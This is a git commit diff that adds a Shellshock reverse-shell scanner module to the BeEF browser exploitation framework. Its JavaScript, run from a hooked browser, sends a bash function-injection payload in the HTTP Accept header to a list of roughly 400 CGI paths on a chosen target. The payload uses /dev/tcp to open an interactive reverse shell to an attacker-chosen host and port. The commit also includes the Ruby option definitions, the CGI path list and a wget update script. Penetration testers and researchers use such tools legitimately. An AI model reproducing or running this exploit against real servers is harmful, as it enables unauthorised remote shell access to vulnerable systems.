Add Shell Shock Scanner module

2014-10-30 00:09:18 +00:00
parent fb5712131e
commit cc0993a2eb
5 changed files with 547 additions and 0 deletions
--- a/modules/exploits/shell_shock_scanner/command.js
+++ b/modules/exploits/shell_shock_scanner/command.js
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rproto = '<%= @rproto %>';
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var target = rproto + '://' + rhost + ':' + rport; 
+  var method = '<%= @method %>';
+  var wait = '<%= @wait %>';
+  var timeout = '<%= @timeout %>';
+
+  get_cgi = function(uri) {
+    try {
+      var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
+      var xhr = new XMLHttpRequest();
+      xhr.open(method, target+uri, true);
+      xhr.onload = function () {
+      };
+      xhr.onreadystatechange = function () {
+        if (xhr.readyState == 4 && xhr.status == 200) {
+            beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+        }
+      }
+      xhr.setRequestHeader("Accept", payload);
+      xhr.send(null);
+    } catch (e){
+      beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+    }
+  }
+
+  var scripts = new Array(
+<%=
+  scripts = []
+  File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
+    file_handle.each_line do |line|
+      uri = line.chomp!
+      next if uri =~ /^#/
+      next if uri.nil?
+      scripts << "'#{uri}'"
+    end
+  end
+  scripts.shuffle.join(",\n")
+%>
+);
+
+  // add scripts to queue
+  var requests = [];
+  for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
+
+  // process queue
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
+  var handle = setInterval(function() {
+    if (requests.length > 0) {
+      get_cgi(requests.pop());
+    } else cleanup();
+  }, wait*1000);
+
+  // clean up
+  cleanup = function() {
+    if (handle) {
+      beef.debug("Killing timer [ID: " + handle + "]");
+      clearInterval(handle);
+      handle = 0;
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+    }
+  }
+  setTimeout("cleanup();", timeout*1000);
+
+});
--- a/modules/exploits/shell_shock_scanner/config.yaml
+++ b/modules/exploits/shell_shock_scanner/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        shell_shock_scanner:
+            enable: true
+            category: "Exploits"
+            name: "Shell Shock Scanner (Reverse Shell)"
+            description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
+            authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/shell_shock_scanner/module.rb
+++ b/modules/exploits/shell_shock_scanner/module.rb
@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Shell_shock_scanner < BeEF::Core::Command
+  
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'method', 'ui_label' => 'HTTP Method',  'value' => 'GET' },
+			{ 'name' => 'rproto',
+				'type' => 'combobox',
+				'ui_label' => 'Target Protocol',
+				'store_type' => 'arraystore',
+				'store_fields' => ['rproto'],
+				'store_data' => [
+					['http'],
+					['https']
+				],
+				'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+				'valueField' => 'rproto',
+				'displayField' => 'rproto',
+				'mode' => 'local',
+				'autoWidth' => true
+			},
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' },
+			{ 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
+			{ 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
--- a/modules/exploits/shell_shock_scanner/shocker-cgi_list
+++ b/modules/exploits/shell_shock_scanner/shocker-cgi_list
@@ -0,0 +1,410 @@
+# Resource file for shocker.py
+# List of pages/scripts potentially vulnerable to Shellshock
+# One per line, no commas, spaces, tabs, etc.
+# Credits to the following from whence many were borrowed:
+# https://github.com/mubix/shellshocker-pocs/blob/master/shell_sprayer.py
+# http://patrickpierson.us/wp-content/uploads/2014/09/shellshock.txt
+#  http://khalil-shreateh.com/khalil.shtml/index.php/websites/websites-security/201-ais-shellshock-scanning-tool-that-leverages-the-user-agent-header-against-a-large-list-of-possible-targets-written-in-c.html?showall=1
+# http://www.linuxfeed.org/2014/10/advanced-information-security-shellshock-scanner/
+# https://github.com/francisck/shellshock-cgi/blob/master/shellshock_cgi.py
+# http://shellshock.detectify.com
+/
+/admin.cgi
+/administrator.cgi
+/agora.cgi
+/aktivate/cgi-bin/catgy.cgi
+/analyse.cgi
+/apps/web/vs_diag.cgi
+/axis-cgi/buffer/command.cgi
+/b2-include/b2edit.showposts.php
+/bandwidth/index.cgi
+/bigconf.cgi
+/cartcart.cgi
+/cart.cgi
+/ccbill/whereami.cgi
+/cgi-bin/14all-1.1.cgi
+/cgi-bin/14all.cgi
+/cgi-bin/a1disp3.cgi
+/cgi-bin/a1stats/a1disp3.cgi
+/cgi-bin/a1stats/a1disp4.cgi
+/cgi-bin/addbanner.cgi
+/cgi-bin/add_ftp.cgi
+/cgi-bin/adduser.cgi
+/cgi-bin/admin/admin.cgi
+/cgi-bin/admin.cgi
+/cgi-bin/admin/getparam.cgi
+/cgi-bin/adminhot.cgi
+/cgi-bin/admin.pl
+/cgi-bin/admin/setup.cgi
+/cgi-bin/adminwww.cgi
+/cgi-bin/af.cgi
+/cgi-bin/aglimpse.cgi
+/cgi-bin/alienform.cgi
+/cgi-bin/AnyBoard.cgi
+/cgi-bin/architext_query.cgi
+/cgi-bin/astrocam.cgi
+/cgi-bin/AT-admin.cgi
+/cgi-bin/AT-generate.cgi
+/cgi-bin/auction/auction.cgi
+/cgi-bin/auktion.cgi
+/cgi-bin/ax-admin.cgi
+/cgi-bin/ax.cgi
+/cgi-bin/axs.cgi
+/cgi-bin/badmin.cgi
+/cgi-bin/banner.cgi
+/cgi-bin/bannereditor.cgi
+/cgi-bin/bb-ack.sh
+/cgi-bin/bb-histlog.sh
+/cgi-bin/bb-hist.sh
+/cgi-bin/bb-hostsvc.sh
+/cgi-bin/bb-replog.sh
+/cgi-bin/bb-rep.sh
+/cgi-bin/bbs_forum.cgi
+/cgi-bin/bigconf.cgi
+/cgi-bin/bizdb1-search.cgi
+/cgi-bin/blog/mt-check.cgi
+/cgi-bin/blog/mt-load.cgi
+/cgi-bin/bnbform.cgi
+/cgi-bin/book.cgi
+/cgi-bin/boozt/admin/index.cgi
+/cgi-bin/bsguest.cgi
+/cgi-bin/bslist.cgi
+/cgi-bin/build.cgi
+/cgi-bin/bulk/bulk.cgi
+/cgi-bin/cached_feed.cgi
+/cgi-bin/cachemgr.cgi
+/cgi-bin/calendar/index.cgi
+/cgi-bin/cartmanager.cgi
+/cgi-bin/cbmc/forums.cgi
+/cgi-bin/ccvsblame.cgi
+/cgi-bin/c_download.cgi
+/cgi-bin/cgforum.cgi
+/cgi-bin/.cgi
+/cgi-bin/cgi_process
+/cgi-bin/classified.cgi
+/cgi-bin/classifieds.cgi
+/cgi-bin/classifieds/classifieds.cgi
+/cgi-bin/classifieds/index.cgi
+/cgi-bin/.cobalt/alert/service.cgi
+/cgi-bin/.cobalt/message/message.cgi
+/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
+/cgi-bin/commandit.cgi
+/cgi-bin/commerce.cgi
+/cgi-bin/common/listrec.pl
+/cgi-bin/compatible.cgi
+/cgi-bin/Count.cgi
+/cgi-bin/csChatRBox.cgi
+/cgi-bin/csGuestBook.cgi
+/cgi-bin/csLiveSupport.cgi
+/cgi-bin/CSMailto.cgi
+/cgi-bin/CSMailto/CSMailto.cgi
+/cgi-bin/csNews.cgi
+/cgi-bin/csNewsPro.cgi
+/cgi-bin/csPassword.cgi
+/cgi-bin/csPassword/csPassword.cgi
+/cgi-bin/csSearch.cgi
+/cgi-bin/csv_db.cgi
+/cgi-bin/cvsblame.cgi
+/cgi-bin/cvslog.cgi
+/cgi-bin/cvsquery.cgi
+/cgi-bin/cvsqueryform.cgi
+/cgi-bin/day5datacopier.cgi
+/cgi-bin/day5datanotifier.cgi
+/cgi-bin/db_manager.cgi
+/cgi-bin/dbman/db.cgi
+/cgi-bin/dcforum.cgi
+/cgi-bin/dcshop.cgi
+/cgi-bin/dfire.cgi
+/cgi-bin/diagnose.cgi
+/cgi-bin/dig.cgi
+/cgi-bin/directorypro.cgi
+/cgi-bin/download.cgi
+/cgi-bin/e87_Ba79yo87.cgi
+/cgi-bin/emu/html/emumail.cgi
+/cgi-bin/emumail.cgi
+/cgi-bin/emumail/emumail.cgi
+/cgi-bin/enter.cgi
+/cgi-bin/environ.cgi
+/cgi-bin/ezadmin.cgi
+/cgi-bin/ezboard.cgi
+/cgi-bin/ezman.cgi
+/cgi-bin/ezshopper2/loadpage.cgi
+/cgi-bin/ezshopper3/loadpage.cgi
+/cgi-bin/ezshopper/loadpage.cgi
+/cgi-bin/ezshopper/search.cgi
+/cgi-bin/faqmanager.cgi
+/cgi-bin/FileSeek2.cgi
+/cgi-bin/FileSeek.cgi
+/cgi-bin/finger.cgi
+/cgi-bin/flexform.cgi
+/cgi-bin/fom.cgi
+/cgi-bin/fom/fom.cgi
+/cgi-bin/FormHandler.cgi
+/cgi-bin/FormMail.cgi
+/cgi-bin/gbadmin.cgi
+/cgi-bin/gbook/gbook.cgi
+/cgi-bin/generate.cgi
+/cgi-bin/getdoc.cgi
+/cgi-bin/gH.cgi
+/cgi-bin/gm-authors.cgi
+/cgi-bin/gm.cgi
+/cgi-bin/gm-cplog.cgi
+/cgi-bin/guestbook.cgi
+/cgi-bin/handler
+/cgi-bin/handler.cgi
+/cgi-bin/handler/netsonar
+/cgi-bin/hitview.cgi
+/cgi-bin/hsx.cgi
+/cgi-bin/html2chtml.cgi
+/cgi-bin/html2wml.cgi
+/cgi-bin/htsearch.cgi
+/cgi-bin/icat
+/cgi-bin/if/admin/nph-build.cgi
+/cgi-bin/ikonboard/help.cgi
+/cgi-bin/ImageFolio/admin/admin.cgi
+/cgi-bin/imageFolio.cgi
+/cgi-bin/index.cgi
+/cgi-bin/infosrch.cgi
+/cgi-bin/jammail.pl
+/cgi-bin/journal.cgi
+/cgi-bin/lastlines.cgi
+/cgi-bin/loadpage.cgi
+/cgi-bin/login.cgi
+/cgi-bin/logit.cgi
+/cgi-bin/log-reader.cgi
+/cgi-bin/lookwho.cgi
+/cgi-bin/lwgate.cgi
+/cgi-bin/MachineInfo
+/cgi-bin/MachineInfo
+/cgi-bin/magiccard.cgi
+/cgi-bin/mail/emumail.cgi
+/cgi-bin/maillist.cgi
+/cgi-bin/mailnews.cgi
+/cgi-bin/mail/nph-mr.cgi
+/cgi-bin/main.cgi
+/cgi-bin/main_menu.pl
+/cgi-bin/man.sh
+/cgi-bin/mini_logger.cgi
+/cgi-bin/mmstdod.cgi
+/cgi-bin/moin.cgi
+/cgi-bin/mojo/mojo.cgi
+/cgi-bin/mrtg.cgi
+/cgi-bin/mt.cgi
+/cgi-bin/mt/mt.cgi
+/cgi-bin/mt/mt-check.cgi
+/cgi-bin/mt/mt-load.cgi
+/cgi-bin/mt-static/mt-check.cgi
+/cgi-bin/mt-static/mt-load.cgi
+/cgi-bin/musicqueue.cgi
+/cgi-bin/myguestbook.cgi
+/cgi-bin/.namazu.cgi
+/cgi-bin/nbmember.cgi
+/cgi-bin/netauth.cgi
+/cgi-bin/netpad.cgi
+/cgi-bin/newsdesk.cgi
+/cgi-bin/nlog-smb.cgi
+/cgi-bin/nph-emumail.cgi
+/cgi-bin/nph-exploitscanget.cgi
+/cgi-bin/nph-publish.cgi
+/cgi-bin/nph-test.cgi
+/cgi-bin/pagelog.cgi
+/cgi-bin/pbcgi.cgi
+/cgi-bin/perlshop.cgi
+/cgi-bin/pfdispaly.cgi
+/cgi-bin/pfdisplay.cgi
+/cgi-bin/phf.cgi
+/cgi-bin/photo/manage.cgi
+/cgi-bin/photo/protected/manage.cgi
+/cgi-bin/php-cgi
+/cgi-bin/php.cgi
+/cgi-bin/php.fcgi
+/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi
+/cgi-bin/pollssi.cgi
+/cgi-bin/postcards.cgi
+/cgi-bin/powerup/r.cgi
+/cgi-bin/printenv
+/cgi-bin/probecontrol.cgi
+/cgi-bin/profile.cgi
+/cgi-bin/publisher/search.cgi
+/cgi-bin/quickstore.cgi
+/cgi-bin/quizme.cgi
+/cgi-bin/ratlog.cgi
+/cgi-bin/r.cgi
+/cgi-bin/register.cgi
+/cgi-bin/replicator/webpage.cgi/
+/cgi-bin/responder.cgi
+/cgi-bin/robadmin.cgi
+/cgi-bin/robpoll.cgi
+/cgi-bin/rtpd.cgi
+/cgi-bin/sbcgi/sitebuilder.cgi
+/cgi-bin/scoadminreg.cgi
+/cgi-bin-sdb/printenv
+/cgi-bin/sdbsearch.cgi
+/cgi-bin/search
+/cgi-bin/search.cgi
+/cgi-bin/search/search.cgi
+/cgi-bin/sendform.cgi
+/cgi-bin/shop.cgi
+/cgi-bin/shopper.cgi
+/cgi-bin/shopplus.cgi
+/cgi-bin/showcheckins.cgi
+/cgi-bin/simplestguest.cgi
+/cgi-bin/simplestmail.cgi
+/cgi-bin/smartsearch.cgi
+/cgi-bin/smartsearch/smartsearch.cgi
+/cgi-bin/snorkerz.bat
+/cgi-bin/snorkerz.bat
+/cgi-bin/snorkerz.cmd
+/cgi-bin/snorkerz.cmd
+/cgi-bin/sojourn.cgi
+/cgi-bin/spin_client.cgi
+/cgi-bin/start.cgi
+/cgi-bin/status
+/cgi-bin/status_cgi
+/cgi-bin/store/agora.cgi
+/cgi-bin/store.cgi
+/cgi-bin/store/index.cgi
+/cgi-bin/survey.cgi
+/cgi-bin/sync.cgi
+/cgi-bin/talkback.cgi
+/cgi-bin/technote/main.cgi
+/cgi-bin/test2.pl
+/cgi-bin/test-cgi
+/cgi-bin/test.cgi
+/cgi-bin/testing_whatever
+/cgi-bin/test/test.cgi
+/cgi-bin/tidfinder.cgi
+/cgi-bin/tigvote.cgi
+/cgi-bin/title.cgi
+/cgi-bin/top.cgi
+/cgi-bin/traffic.cgi
+/cgi-bin/troops.cgi
+/cgi-bin/ttawebtop.cgi/
+/cgi-bin/ultraboard.cgi
+/cgi-bin/upload.cgi
+/cgi-bin/urlcount.cgi
+/cgi-bin/viewcvs.cgi
+/cgi-bin/view_help.cgi
+/cgi-bin/viralator.cgi
+/cgi-bin/virgil.cgi
+/cgi-bin/vote.cgi
+/cgi-bin/vpasswd.cgi
+/cgi-bin/way-board.cgi
+/cgi-bin/way-board/way-board.cgi
+/cgi-bin/webbbs.cgi
+/cgi-bin/webcart/webcart.cgi
+/cgi-bin/webdist.cgi
+/cgi-bin/webif.cgi
+/cgi-bin/webmail/html/emumail.cgi
+/cgi-bin/webmap.cgi
+/cgi-bin/webspirs.cgi
+/cgi-bin/Web_Store/web_store.cgi
+/cgi-bin/whois.cgi
+/cgi-bin/whois_raw.cgi
+/cgi-bin/whois/whois.cgi
+/cgi-bin/wrap
+/cgi-bin/wrap.cgi
+/cgi-bin/wwwboard.cgi.cgi
+/cgi-bin/YaBB/YaBB.cgi
+/cgi-bin/zml.cgi
+/cgi-mod/index.cgi
+/cgis/wwwboard/wwwboard.cgi
+/cgi-sys/addalink.cgi
+/cgi-sys/defaultwebpage.cgi
+/cgi-sys/domainredirect.cgi
+/cgi-sys/entropybanner.cgi
+/cgi-sys/entropysearch.cgi
+/cgi-sys/FormMail-clone.cgi
+/cgi-sys/helpdesk.cgi
+/cgi-sys/mchat.cgi
+/cgi-sys/randhtml.cgi
+/cgi-sys/realhelpdesk.cgi
+/cgi-sys/realsignup.cgi
+/cgi-sys/signup.cgi
+/connector.cgi
+/cp/rac/nsManager.cgi
+/create_release.sh
+/CSNews.cgi
+/csPassword.cgi
+/dcadmin.cgi
+/dcboard.cgi
+/dcforum.cgi
+/dcforum/dcforum.cgi
+/debuff.cgi
+/debug.cgi
+/details.cgi
+/edittag/edittag.cgi
+/emumail.cgi
+/enter_buff.cgi
+/enter_bug.cgi
+/ez2000/ezadmin.cgi
+/ez2000/ezboard.cgi
+/ez2000/ezman.cgi
+/fcgi-bin/echo
+/fcgi-bin/echo
+/fcgi-bin/echo2
+/fcgi-bin/echo2
+/Gozila.cgi
+/hitmatic/analyse.cgi
+/hp_docs/cgi-bin/index.cgi
+/html/cgi-bin/cgicso
+/html/cgi-bin/cgicso
+/index.cgi
+/info.cgi
+/infosrch.cgi
+/login.cgi
+/mailview.cgi
+/main.cgi
+/megabook/admin.cgi
+/ministats/admin.cgi
+/mods/apage/apage.cgi
+/_mt/mt.cgi
+/musicqueue.cgi
+/ncbook.cgi
+/newpro.cgi
+/newsletter.sh
+/oem_webstage/cgi-bin/oemapp_cgi
+/page.cgi
+/parse_xml.cgi
+/photodata/manage.cgi
+/photo/manage.cgi
+/print.cgi
+/process_buff.cgi
+/process_bug.cgi
+/pub/english.cgi
+/quikmail/nph-emumail.cgi
+/quikstore.cgi
+/reviews/newpro.cgi
+/ROADS/cgi-bin/search.pl
+/sample01.cgi
+/sample02.cgi
+/sample03.cgi
+/sample04.cgi
+/sampleposteddata.cgi
+/scancfg.cgi
+/scancfg.cgi
+/servers/link.cgi
+/setpasswd.cgi
+/SetSecurity.shm
+/shop/member_html.cgi
+/shop/normal_html.cgi
+/site_searcher.cgi
+/siteUserMod.cgi
+/submit.cgi
+/technote/print.cgi
+/template.cgi
+/test.cgi
+/upload.cgi
+/userreg.cgi
+/users/scripts/submit.cgi
+/vood/cgi-bin/vood_view.cgi
+/Web_Store/web_store.cgi
+/webtools/bonsai/ccvsblame.cgi
+/webtools/bonsai/cvsblame.cgi
+/webtools/bonsai/cvslog.cgi
+/webtools/bonsai/cvsquery.cgi
+/webtools/bonsai/cvsqueryform.cgi
+/webtools/bonsai/showcheckins.cgi
+/wwwadmin.cgi
+/wwwboard.cgi
+/wwwboard/wwwboard.cgi
--- a/modules/exploits/shell_shock_scanner/update-list
+++ b/modules/exploits/shell_shock_scanner/update-list
@@ -0,0 +1,5 @@
+#!/bin/sh
+echo "[*] Deleting old shocker-cgi_list..."
+rm shocker-cgi_list
+echo "[*] Downloading latest shocker-cgi_list..."
+wget "https://raw.githubusercontent.com/nccgroup/shocker/master/shocker-cgi_list"